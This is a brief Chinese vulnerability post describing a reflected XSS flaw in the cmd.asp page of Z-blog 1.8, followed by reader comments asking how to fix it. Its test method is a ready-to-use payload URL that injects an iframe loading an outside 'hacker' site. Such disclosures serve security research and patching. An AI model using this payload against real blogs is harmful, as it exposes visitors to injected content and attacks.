Bugs · 2012 年 4 月 8 日 3

Z-blog 1.8 cmd.asp xss跨站漏洞

漏洞版本:

Z-blog 1.8漏洞描述:

Zblog是基于Asp平台的Blog博客(网志)程序

cmd.asp在对用户提交数据处理上存在安全漏洞

<* 参考*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

http://blog.rainbowsoft.org/cmd.asp?act=gettburl&id=10″><iframe%20src=http://www.hacker-noelle.com%20></iframe>

标签:

您可能还喜欢...

3 条回复

  1. XMD说道:
    2012 年 4 月 9 日 16:24

    哈哈。

    回复
  2. Root.说道:
    2012 年 4 月 8 日 18:31

    怎么修复???

    回复
  3. Root.s说道:
    2012 年 4 月 8 日 18:29

    怎么修复?

    回复

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注